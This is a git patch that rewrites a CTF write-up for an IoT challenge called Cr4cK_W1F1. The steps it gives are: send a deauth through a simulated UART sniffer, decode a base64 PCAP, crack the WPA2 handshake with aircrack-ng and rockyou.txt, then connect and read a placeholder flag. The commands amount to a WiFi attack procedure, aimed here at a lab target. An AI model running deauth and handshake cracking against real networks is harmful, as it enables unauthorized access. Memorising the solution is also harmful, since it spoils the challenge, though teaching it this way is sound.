From 1b13d8fe656a186476b9e2c60c53e683d8d1f2fa Mon Sep 17 00:00:00 2001 From: Eun0us Date: Thu, 26 Mar 2026 17:33:30 +0000 Subject: [PATCH] write-up: IoT/Cr4cK_w1f1/README.md --- IoT/Cr4cK_w1f1/README.md | 97 +++++++++++++++++++++++++++++++--------- 1 file changed, 75 insertions(+), 22 deletions(-) diff --git a/IoT/Cr4cK_w1f1/README.md b/IoT/Cr4cK_w1f1/README.md index 13732f8..a6e41e5 100644 --- a/IoT/Cr4cK_w1f1/README.md +++ b/IoT/Cr4cK_w1f1/README.md @@ -1,27 +1,62 @@ -# Cr4ck_W1F1 — Solution +# Cr4cK_W1F1 -**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}` +| Field | Value | +|-------|-------| +| Category | IoT | +| Difficulty | Medium | +| Points | TBD | +| Author | Eun0us | +| CTF | Espilon 2026 | -> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement. +--- -## Overview +## Description -UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis -connecte au réseau pour lire le flag. +You recover a UART access on a red team WiFi sniffer tool. +Analyze the captured data to recover the WiFi password, then connect to the network and +retrieve the flag. -- **TX (port 1111)**: Read only -- **RX (port 2222)**: Write only +- TX (read UART): port 1111 +- RX (write UART): port 2222 -## Steps +--- -1. Ouvrir deux terminaux : +## TL;DR + +Use the sniffer to force a WPA2 4-way handshake capture, extract the PCAP from the UART +output (base64-encoded), crack the handshake with `aircrack-ng` and `rockyou.txt` to find +the passphrase `sunshine`, then connect and read the flag. + +--- + +## Tools + +| Tool | Purpose | +|------|---------| +| `nc` | Connect to UART TX/RX ports | +| `base64` | Decode the PCAP blob | +| `aircrack-ng` | Crack WPA2 handshake | +| `rockyou.txt` | Password wordlist | + +--- + +## Solution + +### Step 1 — Open both UART channels ```bash -nc 1111 # TX — lecture -nc 2222 # RX — écriture +# Terminal 1 — TX (read output) +nc 1111 + +# Terminal 2 — RX (send commands) +nc 2222 ``` -1. Dans RX, démarrer le sniffer et forcer un re-handshake : +> 📸 `[screenshot: two terminals showing TX output and RX prompt]` + +### Step 2 — Start the sniffer and force a deauth + +In the RX terminal: ```text sniffer start @@ -29,38 +64,56 @@ deauth TestNet 02:00:00:aa:00:01 sniffer stop ``` -1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs : +The deauthentication forces the target client to reconnect and redo the WPA2 4-way handshake. + +### Step 3 — Extract the PCAP from TX + +On the TX terminal, output appears between markers: ```text PCAP_BASE64_BEGIN -... + PCAP_BASE64_END ``` -Sauvegarder et décoder : +Copy the base64 lines to a file and decode: ```bash base64 -d handshake.b64 > handshake.pcap ``` -1. Cracker la capture : +> 📸 `[screenshot: TX output showing the PCAP_BASE64 markers]` + +### Step 4 — Crack the WPA2 handshake ```bash aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap -# → KEY FOUND! [ sunshine ] ``` -1. Se connecter au réseau et lire le flag : +Output: + +``` +KEY FOUND! [ sunshine ] +``` + +> 📸 `[screenshot: aircrack-ng finding the key]` + +### Step 5 — Connect and read the flag + +In the RX terminal: ```text connect TestNet sunshine cat /flag.txt ``` +> 📸 `[screenshot: RX terminal returning the flag after connecting to the network]` + +--- + ## Flag `CTF{CR4CK_W1F1_EXAMPLE}` -## Author - -Eun0us +> Note: This challenge was still being finalized at time of writing. The flag above is +> a placeholder; the real flag will be updated before deployment.